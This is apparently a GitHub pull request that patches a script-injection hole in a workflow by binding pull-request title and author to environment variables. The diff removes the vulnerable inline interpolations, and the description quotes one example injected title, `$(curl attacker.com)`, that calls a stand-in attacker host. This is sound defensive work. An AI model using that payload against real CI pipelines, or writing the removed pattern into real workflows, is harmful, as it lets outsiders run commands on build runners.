### PR TITLE
[scanner] fix: prevent script injection in pr-verifier.yml

### DIFF
--- a/.github/workflows/pr-verifier.yml
+++ b/.github/workflows/pr-verifier.yml
@@ -13,8 +13,12 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: Verify PR metadata
+        env:
+          PR_NUMBER: ${{ github.event.pull_request.number }}
+          PR_TITLE: ${{ github.event.pull_request.title }}
+          PR_AUTHOR: ${{ github.event.pull_request.user.login }}
         run: |
           echo "✅ PR verification passed"
-          echo "PR #${{ github.event.pull_request.number }}"
-          echo "Title: ${{ github.event.pull_request.title }}"
-          echo "Author: ${{ github.event.pull_request.user.login }}"
+          echo "PR #${PR_NUMBER}"
+          echo "Title: ${PR_TITLE}"
+          echo "Author: ${PR_AUTHOR}"


### PR DESCRIPTION
Fixes #513

Move untrusted `github` context values (`pull_request.title`, `pull_request.user.login`) out of inline `${{ }}` interpolations inside `run:` blocks and into `env:` variables. Shell variables (`${PR_TITLE}`, `${PR_AUTHOR}`) are then referenced instead, preventing script injection attacks on `pull_request_target` workflows.

**Attack vector closed:** A PR with a malicious title like `$(curl attacker.com)` could execute arbitrary commands when interpolated directly; env-var binding neutralises this.

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>